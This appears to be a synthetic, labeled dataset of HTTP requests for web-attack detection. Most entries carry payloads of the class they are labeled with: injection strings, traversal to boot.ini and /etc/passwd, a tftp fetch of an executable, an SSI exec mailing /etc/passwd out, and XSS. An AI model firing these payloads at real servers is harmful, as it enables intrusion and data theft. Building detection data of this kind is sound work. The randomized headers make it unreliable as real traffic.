From: uiaeltm@8ehtblt.biz
If-Modified-Since: Mon, 16 Nov 09 14:31:55 UTC
If-Unmodified-Since: Mon, 26 Nov 07 23:49:47 UTC
If-Match: "piIuvh_cu@QBmPIO"
If-None-Match: "PrDDuqcxo03A.BA0"
If-Range: "Kdd16RWG6ofbBQIF"
Max-Forwards: 431
MIME-Version: 2.6
Pragma: o='arb'
Proxy-Authorization: Digest response="8a53FcC7Ddbc193e48E8D78D14E7FaAD"
Authorization: Digest username="6yeim"
Range: 0756-,6170-,99043-471
Referer: http://tdehA.de/aqIrttm/gsaiO0vs/pses/9ehYAled/dlrfn.asp
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: teEhTnt4n/4.1.1.0
UA-CPU: PowerPC
UA-Disp: 084,5683,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 881x134
Via: HTTP/4.5 www.TssWz.tiff:645, HTTP/3.6 25.172.71.120, 8.7 4.202.76.11
Transfer-Encoding: gzip
X-Forwarded-For: 249.181.31.217
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43589
Start - Id: 48866
class: XPathInjection
GET /d9D/qrUdafzsrreaeeud/rvom.mxDZ.swf?ortb1urete9=edr&taeLeorntanaedE=nene&xgohesr=rvNlne&h3ccedol1=423&e8evmEp=drtVehhl&huna=i%40R3Vd8sGUEN&ieileotzrguH=46&nwnl=7i%27+++++or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++or++++%27nrtas%27+%3D++%27&U9etRm2ob0s9n=AttHet&eysleoD3aext=t HTTP/1.0
Host: www.tshbnaM.com:54
Connection: e9n82
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: gzip, compress, gzip
Accept-Language: npR6dyg-dhEe, Sn-r;q=0.5
Cache-Control: no-transform
Client-ip: 165.80.118.133
Cookie: Felnsshb=gWUS1IMXXS;pgnwEa=veqch;wfss=97888;zrxLe=fezVi64
Cookie2: $Version="570"
Date: Fri, 08 Jun 07 21:20:37 GMT
ETag: "_fRV_D@7oKn-qsK"
Expect: dn6t
From: cSenj7od@i5ssuRhni.com
If-Modified-Since: Fri, 21 Apr 06 11:00:05 CET
If-Unmodified-Since: Fri, 16 May 08 02:48:36 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 4.5
Pragma: eRt='g3'
Proxy-Authorization: Basic aHdmYTY6RXk3aw==
Authorization: 3Elb a13g7hsC=Namthsh
Range: 692-,-672,-664068
Referer: http://naas.it/cdpls/l4frs/osuegss/h1ndoup/otei7eeR.jpeg
TE: deflate;q=0.3,trailers
Trailer: Accept-Charset
User-Agent: rhYh4htn1Stt7r
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1420x8323
Via: et24ca/3.0 254.56.23.172, 4.2 82.111.102.222
Transfer-Encoding: moo1
Upgrade: cntr/0.2, fRir/4.0, qalsS/7.9
Warning: 310 www.eeTl.png "bt2odjjda3vEdintInh" "Thu, 10 Jul 08 17:26:50 GMT"
X-Forwarded-For: 156.103.50.172
X-Serial-Number: 043440
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48866
Start - Id: 40391
class: SSI
GET /Sxssstmunc5ode/5rbotoohtnrisxrcarnn/l2vcmN2CPVUm42rwSUk/tMwVp4.KT2KBR/egrss4en/xY/mR8uqWxaHPxh_GI5xa.gif? HTTP/1.0
Host: 74.50.189.179
Connection: ivdataet
Accept: application/postscript, application/*
Accept-Charset: iso-8859-4;q=0.8, x-mac-turkish;q=0.9, isiri-3342
Accept-Encoding: *;q=0.2
Accept-Language: i-tysnrut8
Cache-Control: no-store
Cookie: alvsidejdttn=h9;ohh=@a xdot;anhhzWc8ndsis=6885011008;aotNej=otn~i;nhogud=<!--   #include virtual="d:\windows\autoexec.bat"   -->
Cookie2: $Version="9"
Date: Tue, 24 Aug 04 10:01:44 GMT
Expect: 100-continue
From: 8ah6@byoebtege.fr
If-Modified-Since: Fri, 20 Mar 09 12:34:17 CET
If-Match: *
If-None-Match: "M2PZ5RhRCVN.xolmB@5a"
If-Range: "IO9d_eoOSzMovBn"
Pragma: no-cache
Referer: http://www.ohAdhh.st/u6ne.mdb
User-Agent: rcnoirep
UA-CPU: 68000
UA-Pixels: 3493x217
Via: prha/6.0 www.tl3se.html, aeo/2.8 www.tnE8Rr3.jpg
Transfer-Encoding: l6iY; hdnptlh=nqftnRRp
----: ----------------------------------

null

End - Id: 40391
Start - Id: 42514
class: SqlInjection
GET /nO5/yzgako/g6LoIXLu/m4cdbtwh/tds1iwtctb/boot.iniOZH6wtobject/jIh@k/h_MOhmW3ydJl.asmx?iNaeNrdasu7e=%27++%2F**%2F+OR+%2F**%2F++%27ov53ai%27++%3E++++%27S&5fgX=2ltmpnlet%29nmocha5%29ndrZu&bour=e8&PQK4jxml_@-v=ao%3E HTTP/1.1
Host: 33.20.39.181
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 17.1.105.246
Cookie: Bexohg=ft3ttwgp7%;dnwlxqcNBo=tuustdinanee 4Atai ]oa;issnaeSma4oxuo=lyoqoet0xsev
Cookie2: $Version="7"
Date: Sat, 14 Feb 09 17:51:20 CET
ETag: "QTJNs90GRqYP0w9uxk2"
Expect: 100-continue
From: be38Ged@6e9snto.ch
If-Modified-Since: Mon, 15 Dec 08 04:40:03 UTC
If-Unmodified-Since: Sun, 02 Sep 07 04:25:35 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 27 Jun 04 18:12:58 UTC
Max-Forwards: 24
MIME-Version: 6.8
Pragma: doiibNn='irtsd'
Proxy-Authorization: NTLM UGFhaXllcmFpZWVlc2VFaTlxbm41enFvb3dEeHNsbmE=
Authorization: NTLM ejBvcXRkeGNyZWV0aXV1QWl5YWNhdGZydW5zcnU4b3IxYW1reXVtTm4=
Range: 430-,2-8084
Referer: http://toas.it/dihsd4oa/qkbhhl/6ass.swf
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: Mozilla/7.4 (Windows; U; WinNT 4.5; ib-Nh; rv:8.1.5) Gecko/75958887
UA-CPU: x86
UA-Disp: 3013,748,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 8264x986
Via: 5.6 65.222.130.51, 4.1 www.Rbsg.png
Transfer-Encoding: f2s3n
Upgrade: ihs/6.9, sw1v/7.0, tkg/8.2, rtlu/7.8, heTt/3.6
Warning: 860 252.84.118.119 "gymdt4aeaea4ehhX" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 171208894897748
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42514
Start - Id: 45728
class: PathTransversal
GET /regQgMSn@Ulo2V/eA/mcndccEitgtt/4jcySD@1myzncebL/KKidw3@h8M1/H.JDsnodeJvcobject/yeu/sD/eN9D.pRiNLU.5r/yogotargqts/safbnlus18abmetyrm/vltkWFJOsx.shtml?ea2Ruvrod9=8%3A%5Cwinnt%5Cboot.ini&dIllecwi=hvaceenx HTTP/1.0
Host: www.aOreboodh.org:2590
Connection: close
Accept: */*
Accept-Charset: windows-1251, windows-1252;q=0.5, euc-cn
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 116.197.250.174
Cookie: 0beEj1.vC=n5M;rhannmrtovens=incsoou;wsd5a=hlcTtet'q1ine;Tae7dxx2liwdso=849966106;ehij= evalh;aHRlU=eQCKBRNb4p
Cookie2: $Version="66"
Date: Wed, 23 Jul 08 22:44:18 UTC
ETag: W/"6TA0sUBIpgg4.xGcl"
Expect: rSosIh9e=a8hwy3h;f2oa3tw=ntAp
From: reani1tb@daeireeubl.de
If-Modified-Since: Tue, 28 Feb 06 15:23:55 CET
If-Unmodified-Since: Fri, 28 Dec 07 20:53:53 CET
If-Match: "@Xo_U-RjGzW82UATgOEU"
If-None-Match: "PDuDe4SZ2XeT@Fa8S"
If-Range: *
Max-Forwards: 84
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: swjmRp fzc3=EdDtese
Authorization: Basic YTF0YmdGdjpoc211dA==
Range: -500252,934-3694
Referer: http://aha4phTy.st/rytam/Xnos3/tafe.swf
TE: chunked;q=0.2,trailers,trailers
Trailer: Expect
User-Agent: Veiydlojs/1.7.8
UA-CPU: Sparc
UA-Disp: 664,891,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 615x1457
Via: 7.2 www.bnulth.jpeg, 5.4 www.Aae7ma.jpg
Transfer-Encoding: identity
Upgrade: eebc/8.1, RfQc/0.5, iec/8.3
Warning: 139 123.133.191.85 "aoRovfiyaetlwhiotHa" "Tue, 27 Apr 10 21:16:33 GMT"
X-Forwarded-For: 199.93.92.127
X-Serial-Number: 1618317
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45728
Start - Id: 39365
class: SSI
GET /msfirReatzleOh/aQTDOdQRDji-l.y@oZQ/asaeaetanATrtret.jsp?rat5Xn=%3C%21--%23email+fromhost%3D%22www.ttharunb.com%22+tohost%3D%22mailbox.lacwe.com%22+message%3D%22lq8da+pnno3aa+s4Ssieg+t4akt%22+fromaddress%3D%22sre9.com%22+toaddress%3D%22anc.sas.com%22+subject%3D%22im%22+sender%3D%22o9a.com%22+replyto%3D%22rhRox27.com%22+cc%3D%227jst%22+inreplyto%3D%22yuei+atSg+id%22+id%3D%22vomail%22+--%3E HTTP/1.1
Host: 141.180.97.2:80
Connection: aootnfhs
Accept: video/quicktime;q=0.2, video/*;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: compress, gzip;q=0.1, gzip;q=0.8, identity;q=0.9, compress;q=0.2
Accept-Language: *
Cache-Control: min-fresh=2890
Client-ip: 45.135.150.208
Cookie: NetcQ6vbscriptZa2ZwP=aCoGcbfGzMxj;jY24AT=34255;Btysle88Iidaif=fvn1t<t3x|o6exec+poe;Hgrofs=en6aHe9KdF;hrwean=qm2htp;fsqy3sn1esA=l>~
Cookie2: $Version="92"
Date: Wed, 21 Oct 09 23:57:10 CET
ETag: "otK3._w2Ir0715BPHo"
Expect: tiprS
From: ztifisTh@itMb.uk
If-Modified-Since: Fri, 30 Oct 09 15:16:07 CET
If-Unmodified-Since: Thu, 03 Sep 09 16:27:46 CET
If-Match: *
If-None-Match: "l5hwTGXkh7vltlvqs"
If-Range: *
Max-Forwards: 0995
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic ZGkwcmFGeXU6ZXBUc2Q=
Authorization: Digest nonce
Range: 3517-0,7-1
Referer: http://www.lhan2y.net/fei1/oedBfapH/2aif.exe
TE: chunked,deflate,deflate
Trailer: Referer
User-Agent: enk7i (tkKYAGDY)
UA-CPU: 68000
UA-Disp: 071,646,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3889x5923
Via: FTP/9.0 239.111.113.3, HTTP/3.2 134.109.189.125
Transfer-Encoding: compress
Upgrade: Dimzxj/0.5, brr9/9.8, nqe8/0.3
Warning: 323 73.178.52.116:03197 "ltotAehablocoeeRgen" "Sun, 08 Feb 09 14:43:34 UTC"
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 93635281760343064416
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39365
Start - Id: 49883
class: XPathInjection
GET /aLQPNq1b.EqIYwN/y_5ehoXsd5HD.3ttV/tdda7/Ai/mn/zR0eqnbn0i.htm?7QIroBWYT50=dn&0sllwrnfoa=t%3A&sd=W%3F&inDthlxc3h3hR=tNe3et6he&erhwniiitn=ran%27%5D+%7C++++P+%7C+++++%2F%2Fuser%5B++++name%2Ftext%28%29++++%3D++++%27ngbgt&ebthnllApu=al3 HTTP/1.0
Host: 182.131.106.80
Connection: close
Accept: application/postscript;q=0.2, image/*;q=0.3, application/postscript
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 161.161.216.27
Cookie: tM78acsao=1635963;gowmtenwiiit8T=nZ2PT0;ida4r9av=olibha6otcri2t6a;uCorsm-FbinQJ=reRttth6h;rsoirenQIwaq2nu=elzoa
Cookie2: $Version="5"
Date: Thu, 20 May 04 08:52:32 CET
ETag: W/"79-wqobJXvLTgCDO1"
Expect: tlaeI
From: s8can@mqtlr.fr
If-Modified-Since: Sun, 24 Jan 10 22:11:14 CET
If-Unmodified-Since: Wed, 06 Dec 06 06:29:44 UTC
If-Match: *
If-None-Match: "pG57oNuT9WEVlj3@KZD"
If-Range: Sun, 06 Aug 06 02:37:20 CET
Max-Forwards: 3
MIME-Version: 6.4
Pragma: iiwtSd='a7cbuQrj'
Proxy-Authorization: oAo4 hnaarqm=nniOb
Authorization: Digest realm
Range: -997,889715-,62803-
Referer: /in2ecnar/cau1/dycM/lecn/0EsUpG.cfm
TE: trailers,trailers,deflate;q=0.4
Trailer: Cache-Control
User-Agent: tq01dbtsiM (iScI_xd; cHJbs7RO9; dfFKBTsj; sFZMI2VdH)
UA-CPU: StrongARM
UA-Disp: 2831,824,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 005x724
Via: HTTP/1.6 137.106.141.159:699
Transfer-Encoding: identity
Upgrade: Ez33h8/8.9, Odopt/6.7, aym/2.3, ttuho/1.9
Warning: 795 www.cmshn.tiff:1 "yslieeph7eoEbmyPt" "Wed, 09 Mar 05 02:21:36 GMT"
X-Forwarded-For: 88.207.99.219
X-Serial-Number: 87544886060
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49883
Start - Id: 39031
class: LdapInjection
PUT /EerALG0ibrgimier/AdJm/6clPvzFU4G/T@K/eeis/C1nph-8TDNSpUiLBVcmd/FOQX.Aq-FBIbetweeny/pnjbceFKLM/hsc6lelme/rchlgshhnssuetn/laccess_logN0uwIcL@nodewd/m6asrahetnAans.bin? HTTP/1.1
Content-Length: 225
Content-Language: s,setnah
Content-Encoding: compress
Content-Location: /0yjerar/gitiue/R8liCee/ot2ue/0Xdmae36.php3
Content-MD5: c24zSWpzcmVudHM0dG9uaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Jun 08 14:30:38 CET
Last-Modified: Fri, 17 Oct 08 14:56:40 GMT
Host: 255.76.75.188
Connection: close
Accept: video/quicktime;q=0.7, audio/*;q=0.0
Accept-Charset: x-mac-icelandic, koi8-r, x-mac-chinesesimp;q=0.8, x-mac-greek;q=0.4, x-mac-roman
Accept-Encoding: )  ( |    (sat=qteee*)
Accept-Language: *
Cache-Control: no-store
Client-ip: 102.168.123.142
Cookie: Chmownoos3=oqGzTA;vd0RG=wcps4uBtV;iiEIeqzuf1tT=tenwpie%umthhhchildr;Id20dI-SYG=iacoqedlaoe;balTneoi=ae
Cookie2: $Version="927"
Date: Wed, 14 Mar 07 06:19:07 GMT
ETag: W/"S@-nxPLI7Fg30dSC"
Expect: 100-continue
From: atitro@THsros.uk
If-Modified-Since: Fri, 31 Jul 09 02:07:12 GMT
If-Unmodified-Since: Sat, 23 May 09 10:59:02 UTC
If-Match: "9xtESaiev8On1C4"
If-None-Match: *
If-Range: Tue, 18 Apr 06 12:43:13 GMT
Max-Forwards: 4
MIME-Version: 9.1
Pragma: atbdprs=I3st9peH
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic bG1zaWVvZzpvemNlb3M=
Range: -15502
Referer: http://www.tsoathi.de/iiosgyl/fcish.nsf
TE: trailers
Trailer: Authorization
User-Agent: Sthesan/3.4.5.0
UA-CPU: PowerPC
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 7332x461
Via: 7.0 82.187.230.104, 7.2 248.200.117.133:38
Transfer-Encoding: deflate
Upgrade: aoese/7.7, il7/0.0, iNtwe/2.8, ofsd/5.6, naOq/0.5
Warning: 658 www.5nnyaqt.jpg:82110 "coUeCYctEacH" "Wed, 16 Jun 04 09:17:55 CET"
X-Forwarded-For: 84.228.185.10
X-Serial-Number: 6446333
----: -------------------
~~~~~: ~~~~~~~~~~~

tlftiAierEecn=8hhsnan&gt1mSs62e6a0e=rFvxPtmFsd&wavuteDffdwenr=deen&ott0rssd=iab&autoexecT2r=hsURcrtztcoera&nirz2repDu=riae~&zKlHJ=3160471&RnEseIh=4&eazwT1em=0K7V&9dncey=689&B8G89L=2575&rA7nido=tS4XQs&wdn2yllgazilix=21965766

End - Id: 39031
Start - Id: 43803
class: OsCommanding
GET /samples/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 184.167.201.166:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.7, euc-kr;q=0.4, cp-936;q=0.6, utf-7;q=0.6
Accept-Encoding: identity;q=0.0, compress, gzip, identity, compress
Accept-Language: Wr-Nans5da, 7-jtf, rty-whxebewk
Cache-Control: max-stale
Client-ip: 69.5.212.169
Cookie: arjat=fromighttp;oq8rude=wN5D7yB;Tj0p=ouziigrtnufde;@W0OnexecG5aR=7niHtls;wpsJuR=36159532;XAYEkK.gphp=Tlr t
Cookie2: $Version="9"
Date: Sat, 12 Mar 05 09:48:03 GMT
ETag: "4oKNvrNCIHYKhCU0chJP"
Expect: u9re=alahjAwN
From: uZkpt@nesht4Iih.ch
If-Modified-Since: Sat, 09 Dec 06 22:34:46 GMT
If-Unmodified-Since: Mon, 14 Mar 05 17:39:49 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 03 May 09 03:44:23 UTC
Max-Forwards: 75
MIME-Version: 0.3
Pragma: tzi=teAce
Proxy-Authorization: Digest cnonce="h4nye"
Authorization: qutgt3 dhItvrl=r0cr5f
Range: 904036-,02113-35,44499-
Referer: /SboHa/pm7not.doc
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/5.6 (compatible; Konqueror/6.8; SunOS sun4u; 5ol8; 4r4dn3; nhicERdaes)
UA-CPU: Sparc
UA-Disp: 7509,580,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 697x813
Via: FTP/0.9 46.63.122.3:505, 6.9 81.99.54.253:659
Transfer-Encoding: deflate
Upgrade: Rteoa/6.1, seif/8.2, nnyoe1/3.7, ai7g/8.2
Warning: 815 www.nitmdae.gif "rfe4pvnricgalni" 
X-Forwarded-For: 73.32.142.166
X-Serial-Number: 055444693738
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43803
Start - Id: 43113
class: OsCommanding
GET /vfoeaeuidts1aaGe/hs5oneltteWgycb/nla2LikqJVrt-VnDC/seXR..nPbxxLg0EUxobJ/ee/txD/3mK3m5b@M4XGX9-.zJS/owt3edtlaitLybYty/0gN_.ZJhne-3yf/twoik/le40jtLgrg6ERBWgHB/nsn5ereelyce.png?e0oapy0ztoA=aclieate7d&5fagat=74372376&los7r=mB_ACb&edtqa2axostl=env9to7mOhIsnXvH&lseee=tftp++-c+get++63.32.226.52%3A%2Fns%2Fon.exe+++++%7C&oeeeJasr=aeepositioneewtllbo%3E&ninN=3009445&tmst2=wKr.&aboheeorca5=win&dcrnacYeeybo=-E&wdptn9lmht=Oarao5ss3t&ulBApHOUAu=nhaeoauiiz&niuc73rfglhlsre=passwdcq&tlar=hs HTTP/1.1
Host: 34.28.220.218
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-kr;q=0.3
Accept-Encoding: *
Accept-Language: 0et5-iouatezo;q=0.2, Dc-e;q=0.7, eyt-e;q=0.7
Cache-Control: no-store
Client-ip: 107.157.218.192
Cookie: itisEbtohe=iBX9fbNh@m
Cookie2: $Version="389"
Date: Sat, 10 Apr 04 22:44:17 GMT
ETag: "WV@RnoNoblIi_WrxHi"
Expect: 100-continue
From: 5aEtd@kfeetndtk6.de
If-Modified-Since: Tue, 09 Oct 07 10:02:17 CET
If-Unmodified-Since: Fri, 04 Apr 08 24:38:37 GMT
If-Match: "DvI21gE0KqW.64h_"
If-None-Match: *
If-Range: "0TpZeFNLd1lmCS8-6wEC"
Max-Forwards: 4537
MIME-Version: 9.7
Pragma: ss='gh'
Proxy-Authorization: NTLM dHNudGs5YWFpZGVvb2hueTZxbWVocmw4VUlTaXRoZ2F1bmlyVHNIdDlSZlVwaW9l
Authorization: ebLw xtl4r=t6xue5
Referer: /zepisshY/iePii.dll
TE: trailers,deflate,trailers
Trailer: Connection
User-Agent: Mozilla/6.0 (compatible; MSIE 8.0; Windows NT; idmj)
UA-CPU: StrongARM
UA-Disp: 046,4473,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 603x2268
Via: 5.8 www.ndqgd.css, Teg/7.3 63.251.131.119
Transfer-Encoding: gzip
Upgrade: Fgohbd/4.1
Warning: 117 www.nI2s.jpeg "duaiiS2" 
X-Forwarded-For: 204.73.145.24
X-Serial-Number: 306986025864028
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43113
Start - Id: 35655
class: XPathInjection
GET /pCtu2c8/tzNaetNuoeheaoodRu/yK7r4fT0varbgsound/Elibpna/tXnJCWknxy7bVOGgrP_3/efx5c3/uf_O/mmmtrbssoran/tYDcCP8wt0bT91.m1.js?jersut=e07gun%27++or++++3Lw1n%2Fleasy%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D7%5D+++++or+++++%27Oesnc%27+++%3D%27 HTTP/1.0
Host: www.3lo0u4r.fr
Connection: tsaoamn
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-transform
Client-ip: 58.89.125.179
Cookie: ajebwsdtolEo6t=stdinorcdy7oe;t7otzynr9=eerrpE;q27te=tVWNvZ29_r;shutdownLj6%u4cF7telnet.I=hnrcdrahhta;Ke=64;nres=m
Cookie2: $Version="449"
Date: Sun, 18 Jan 04 05:32:43 GMT
ETag: "UDJxFP191jf5i2WY"
Expect: 100-continue
From: 8oiisi@uknxnhisdr.org
If-Modified-Since: Tue, 04 Apr 06 10:00:44 UTC
If-Unmodified-Since: Wed, 20 Feb 08 04:32:40 UTC
If-Match: *
If-None-Match: "ELB9rkq_.Cv9cLxCfC1"
If-Range: Thu, 28 Oct 04 20:44:04 GMT
Max-Forwards: 3
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM ZGFueG1ocnRnZnRvNGFjRXVkc3JoZW5Oc0xlZWwzYWtuZVl3
Authorization: tpct Qeea=aleyeri8
Range: -93
Referer: /dtnere.exe
TE: trailers,gzip,trailers
Trailer: User-Agent
User-Agent: tcrteid60ttx
UA-CPU: StrongARM
UA-Disp: 4216,933,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8105x4373
Via: FTP/4.1 12.96.11.51
Transfer-Encoding: compress
Upgrade: deki/7.7
Warning: 083 51.53.107.61:3990 "ittpbttTz" "Fri, 23 May 08 24:15:13 GMT"
X-Forwarded-For: 246.53.246.66
X-Serial-Number: 24734
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35655
Start - Id: 36245
class: PathTransversal
GET /tfe/rJiQ4CNo@so-AZWYx6rU/eneTaeidedeyebe/sdirMs13/gQgN@/aepjvtEpgdysaiio.php3?Id9iOizP5p=haone&thdu7oe1oaseem=64&eakn8SsEshlo=34&i4eaoeafntlpeh=379095&gotuszmtittei=ta&rtaw2dPtlto=nhttps HTTP/1.0
Host: www.ner7adrg.fr
Connection: edrs0le
Accept: video/*;q=0.0, text/xml, image/png
Accept-Charset: *;q=0.3
Accept-Encoding: compress, compress;q=0.4
Accept-Language: *;q=0.7
Cache-Control: min-fresh=90350
Client-ip: 66.234.147.232
Cookie: metarmItQG@orh=htaccesiq;cebtra3a9rplo=\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html
Cookie2: $Version="8"
Date: Mon, 06 Dec 04 24:30:01 UTC
ETag: W/"7iIvh_oA4Zy9CrhbwD"
From: dnQdHsdn@Iotdons.de
If-Modified-Since: Tue, 13 Nov 07 11:09:24 CET
If-Unmodified-Since: Sat, 03 Jun 06 02:14:09 UTC
If-None-Match: "jybD1h018tNpRthBU"
Proxy-Authorization: aour iebnva=aah2
Authorization: Digest nonce
Range: 049424-30,212-7,-55
Referer: /iosi/hngdewo/7nhE5i.php
User-Agent: ioe4seds (tm4tvJ52ad)
UA-Color: color32
Transfer-Encoding: gzip
Upgrade: r2l/7.9, teOei/6.7, hhl/6.9
Warning: 578 www.w8artnsX.css "sWktUtolfiaatit" "Wed, 01 Apr 09 16:36:26 GMT"

null

End - Id: 36245
Start - Id: 39921
class: SSI
POST /nskRd.X/ye/czcBIM56No19/haNest1Eau/v7kKEqDiSvytjj-mZF/ohdshgb9/p8fe/7srtpcdwcmsraes/ildecNaeDhdaerrVw/sxHozD6slPkV9tYz6/c0wDhzZlbaZ_94p0h/nrr2ookah6t32n.gif? HTTP/1.0
Content-Length: 267
Content-Language: t5,ieoo
Content-Encoding: identity
Content-Location: http://rixrh.ch/odltx/lweo07/eeluj.shtml
Content-MD5: YXJzb2FIbDZlbXdEbzNlbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 28 Apr 04 22:53:45 CET
Last-Modified: Thu, 23 Jul 09 19:55:20 UTC
Host: www.eGasmiLey.st
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: 3nopBm8-leol;q=0.8, aeei2ehn-r
Cache-Control: min-fresh=851
Client-ip: 239.36.31.16
Cookie: al=4
Cookie2: $Version="724"
Date: Sun, 15 Feb 04 02:26:03 GMT
ETag: "oFCCtwKdqig7svS9H"
Expect: 100-continue
From: 7v1w1el@eidae.cz
If-Modified-Since: Sun, 16 Jan 05 15:41:18 CET
If-Unmodified-Since: Thu, 09 Jul 09 03:29:13 UTC
If-Match: *
If-None-Match: "S8jwtcrJR3cTv9_"
If-Range: *
Max-Forwards: 88
MIME-Version: 7.2
Pragma: heaEa=rTxoibb
Proxy-Authorization: Digest response="dD0B7d539F14ACC6a145A7c016DF9930"
Authorization: Basic ZGhBaGFpYW46RXVzb0FvZmc=
Referer: /stpkhtr7/rt8no/wTtuetsF.php3
TE: trailers,gzip;q=0.4,trailers
Trailer: Trailer
User-Agent: 7am63eh (r19U9H.cW; iQSDc.qF)
UA-CPU: StrongARM
UA-Disp: 079,5438,8
UA-OS: FreeBSD
UA-Color: color16
Via: FTP/6.8 www.eeh8m.gif, FTP/7.8 119.27.175.250:62
Transfer-Encoding: sptSe
Upgrade: enw/1.2
Warning: 151 www.ttt8oAn.jpg "coIndbni" 
X-Forwarded-For: 54.46.237.13
X-Serial-Number: 2450299915461461
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

C34_7wget4IwhererK=<!-- #exec cmd="/bin/mail   cEi.com <   /etc/passwd"-->&d9nTr=a0pWG9D&ncCSpzny6h=oosa&Ottt66Cf=r&TkEolEroa=eteeleerydwEbe&E3his2shnhig=7379429082&nmt5noiraegjq=890726&framod=smrelis&ewrjei89Co=hoidxTess&batwslpst=mD.wE&auc=9

End - Id: 39921
Start - Id: 46681
class: XSS
GET /Tdimrsunrhcral6/EgTenebni77eiedej/i1dngerDatNd/iPg/sjdmgeSOteS5afeah/uG/fDBw8brnsenMtnftriu/8YPxpewHZPwX28ZN/kedleeis5Tsnh.cfm?clhHs=i&Ksdropz=698&NDnph-d-q1=nbBsLbcUEtR&sai=wmMkAgVcaxl5&6ohi7dri5rho=phpS&eriod5nm0fvros=so%5CismdrE3+LibYrahrp&cS2mo3iett=ir&E2n9n=r2thtpassladIEprocessing-instructioni04corT&arhs=aoticslEre&bie=gh&j4=sJrvcUM4v&p9inly=901700034&yNrv0ntsiipe=pshhcoghsbodygtpeamebl&rauaafty=lnpt HTTP/1.0
Host: www.iugae4N.com
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 113.189.52.52
Cookie: ednotifs2odalDx=ome;aor4eatEulh=&<script >[alert    ('ilddtWz');]</script  >;eHtlxaewi0ecu=a7-E_LQB;hncxe3ZN=h7vixvXU0FWT
Cookie2: $Version="94"
Date: Thu, 05 Oct 06 10:16:58 GMT
ETag: W/"4Mg-80aLzPHGD8aln0L"
Expect: 100-continue
From: ekionh@nouustph.biz
If-Modified-Since: Thu, 06 Mar 08 23:03:18 UTC
If-Unmodified-Since: Fri, 08 Feb 08 20:30:17 UTC
If-Match: "zGsUOWWOtrO9udU"
If-None-Match: *
If-Range: "NlMTaOPuCi18rE5lem"
Max-Forwards: 8
MIME-Version: 1.9
Pragma: ectar='NyIAt'
Proxy-Authorization: NTLM eW5Pb3ZhZGNzN2hzaHJyeGNTbmlzZWV0YmVydGxvcmVh
Authorization: NTLM bmRoZGF5YW9hZWFhb2NjZ3JpdGVmdHBsaGZhbzh0Y2l0NG5FaXB5MnQ4bWxlNw==
Range: 2194-5461,312-2895
Referer: /r8IEnks2/8teoutg/fh1Snl0.tiff
TE: chunked,trailers,trailers
Trailer: If-Modified-Since
User-Agent: spoV5qfi http://www.AQwhtdd.net
UA-CPU: x86
UA-Disp: 445,3184,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 630x4242
Via: HTTP/5.9 134.189.230.91, FTP/6.5 241.178.166.146
Transfer-Encoding: ifiop; e2o5oR=Iufyrib
